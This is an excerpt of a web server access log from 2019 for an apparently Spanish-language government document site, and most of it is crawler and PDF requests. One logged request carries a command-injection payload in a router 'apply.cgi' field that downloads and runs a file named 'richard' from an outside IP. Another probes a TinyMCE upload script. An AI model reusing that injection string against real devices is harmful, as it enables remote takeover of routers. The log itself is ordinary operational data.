66.249.64.145 - - [09/Aug/2019:01:40:32 -0500] "GET /menu/css/demo.css HTTP/1.1" 404 1246
66.249.64.145 - - [09/Aug/2019:01:40:33 -0500] "GET /menu/css/style.css HTTP/1.1" 404 1246
66.249.64.145 - - [09/Aug/2019:01:40:33 -0500] "GET /menu/js/jquery.easing.1.3.js HTTP/1.1" 404 1246
66.249.64.145 - - [09/Aug/2019:01:40:34 -0500] "GET /menu/js/jquery.mousewheel.js HTTP/1.1" 404 1246
66.249.64.145 - - [09/Aug/2019:01:40:34 -0500] "GET /menu/js/jquery.vaccordion.js HTTP/1.1" 404 1246
177.39.83.74 - - [09/Aug/2019:01:40:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%20CONJUNTAS/RESOLUCION%20CONJUNTA%20001%20DE%202019.pdf HTTP/1.0" 200 2134597
69.162.124.233 - - [09/Aug/2019:01:41:00 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.149 - - [09/Aug/2019:01:41:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1887.pdf HTTP/1.1" 200 444264
66.249.64.145 - - [09/Aug/2019:01:41:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0786.pdf HTTP/1.1" 200 55896
66.249.64.145 - - [09/Aug/2019:01:43:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9400.pdf HTTP/1.1" 200 412677
190.217.68.66 - - [09/Aug/2019:01:43:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0905.pdf HTTP/1.1" 200 2170475
192.168.175.104 - - [09/Aug/2019:01:44:42 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Aug/2019:01:44:53 -0500] "GET / HTTP/1.1" 200 9990
54.183.104.100 - - [09/Aug/2019:01:45:46 -0500] "GET / HTTP/1.1" 200 9990
69.162.124.233 - - [09/Aug/2019:01:46:00 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.145 - - [09/Aug/2019:01:46:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4018.pdf HTTP/1.1" 200 882921
54.39.209.227 - - [09/Aug/2019:01:46:01 -0500] "GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&pingCNT=5 HTTP/1.1" 404 1191
66.249.64.145 - - [09/Aug/2019:01:47:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201%20AL%20100/RESOLUCION%200041%20DE%202007.pdf HTTP/1.1" 200 445581
207.46.13.92 - - [09/Aug/2019:01:48:24 -0500] "GET /portalsiaccapacitaciones/Soportes%20Capacitaciones%202016/Mesas%20de%20Trabajo%202016/PRESENTACI%C3%93N%206%20PLANES.pdf HTTP/1.1" 200 2369905
192.168.175.104 - - [09/Aug/2019:01:49:40 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Aug/2019:01:49:51 -0500] "GET / HTTP/1.1" 200 9990
5.255.250.154 - - [09/Aug/2019:01:50:11 -0500] "GET /robots.txt HTTP/1.1" 404 1019
5.255.250.154 - - [09/Aug/2019:01:50:15 -0500] "GET /StormSDA/userFiles/user_files/str_expresiones.xml HTTP/1.1" 200 1502
69.162.124.233 - - [09/Aug/2019:01:51:00 -0500] "HEAD / HTTP/1.1" 200 -
66.212.31.198 - - [09/Aug/2019:01:51:19 -0500] "GET /static/js/tiny_mce/plugins/tinybrowser/upload.php?type=file/wp-login.php HTTP/1.1" 404 1018
